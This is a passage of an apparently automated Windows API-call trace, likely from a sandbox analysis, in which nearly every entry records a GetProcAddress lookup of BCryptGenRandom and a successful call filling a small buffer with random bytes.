cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.438] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.438] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.438] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.438] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.438] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.438] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.439] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.439] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.439] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.439] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.439] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.439] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.439] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.439] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.439] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.439] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.440] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.440] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.440] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.440] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.440] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.440] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.440] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.440] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.440] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.440] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.441] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.441] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.441] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.441] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.441] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.441] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.441] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.441] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.441] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.441] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.442] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.442] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.442] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.442] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.442] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.442] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0176.442] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.442] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0176.442] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.443] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02082, cbBuffer=0x23, dwFlags=0x2 | out: pbBuffer=0x3a02082) returned 0x0 [0176.443] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.443] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.443] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.443] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.443] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.443] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.443] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.443] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.443] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.443] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0176.443] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.443] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.444] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.444] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.444] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.444] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.444] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.444] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.444] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.444] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.444] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.444] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.445] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.445] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.445] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.445] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0176.445] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.445] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.445] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.445] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.445] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.445] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.445] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.446] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.446] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.446] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.446] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.446] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.446] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.446] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.446] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.446] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.446] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.446] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.446] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.446] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.447] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.447] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.447] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.447] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.447] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.447] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.447] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.447] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0176.447] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.447] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a020a5, cbBuffer=0x1a, dwFlags=0x2 | out: pbBuffer=0x3a020a5) returned 0x0 [0176.447] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.447] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.448] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.448] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.448] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.448] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.448] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.448] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.448] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.448] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.448] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.448] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.448] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.448] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.448] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.448] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.449] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.449] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.449] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.449] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.449] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.449] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.449] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.449] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.449] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.449] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.450] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.450] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.450] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.450] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.450] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.450] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.450] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.450] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.450] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.450] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.451] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.451] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.451] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.451] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.451] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.451] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0176.451] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.451] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a020bf, cbBuffer=0x1d, dwFlags=0x2 | out: pbBuffer=0x3a020bf) returned 0x0 [0176.451] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.451] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.452] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.452] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.452] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.452] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.452] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.452] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.452] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.452] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.452] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.453] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.453] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.453] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.453] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.453] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.453] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.453] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.453] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.453] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.453] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.454] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.454] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.454] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.454] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.454] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.454] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.454] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.455] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.455] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.455] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.455] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.455] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.455] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.456] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.456] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.456] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.456] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.457] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.457] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.457] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.457] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.457] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.458] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.458] GetProcAddress (hModule=0x7ffc5bcc0000, 